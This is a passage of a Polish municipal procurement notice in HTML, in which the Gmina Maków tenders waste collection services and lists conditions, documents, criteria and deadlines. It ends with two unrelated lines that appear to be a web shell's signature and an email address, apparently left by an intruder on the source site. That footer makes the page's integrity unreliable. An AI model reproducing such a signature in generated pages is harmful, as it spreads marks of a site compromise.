zmieniająca uchwałę w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów Dz. Urz. Woj. Łódzkiego z dnia 16 maja 2013 r. poz. 2749 - załącznik do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienia, tj. posiada wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Maków w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami Ustawy z dn. 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (Dz. U. z 2012 r., poz. 391) oraz - posiada zezwolenie na prowadzenie działalności w zakresie zbierania i transportu zgodnie z wymogami Ustawy z dn. 14 grudnia 2012 o odpadach (Dz. U. z 2013 r., poz. 21), zgodnie z ustawą z dnia 29 lipca 2005 roku o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. Nr 180, poz. 1495 z późn. zm.) oraz - posiada wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada wiedzę i doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zadania polegające na odbieraniu odpadów komunalnych z nieruchomości o wartości nie mniejszej niż 200 000,00 zł brutto każde.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia niniejszego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia niniejszego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia niniejszego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
Zamawiający zastrzega możliwość wprowadzenia istotnych zmian postanowień zawartej umowy. W szczególności postanowienia umowy mogą ulec zmianie w następującym zakresie oraz na następujących warunkach: a)	warunki oraz termin płatności, w szczególności w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego, jak również w przypadku gdy ze względu na interes Zamawiającego zmiana warunków oraz terminu płatności jest konieczna b)	sposób wykonania przedmiotu zamówienia, w szczególności gdy zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia c)	ograniczenie zakresu przedmiotu umowy, w przypadku zaistnienia okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz ze związanym z tym obniżeniem wynagrodzenia d)	zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi; zmianie może ulec termin realizacji zamówienia e)	zmiana sposobu spełnienia świadczenia wskutek zmian technologicznych, w szczególności: pojawienie się na rynku sprzętu / urządzeń nowszej generacji, o parametrach korzystniejszych dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.makow.bipst.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Maków ul. Główna 12 96-124 Maków pok. nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 09:30, miejsce: Urząd Gminy Maków ul. Główna 12 96-124 Maków pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com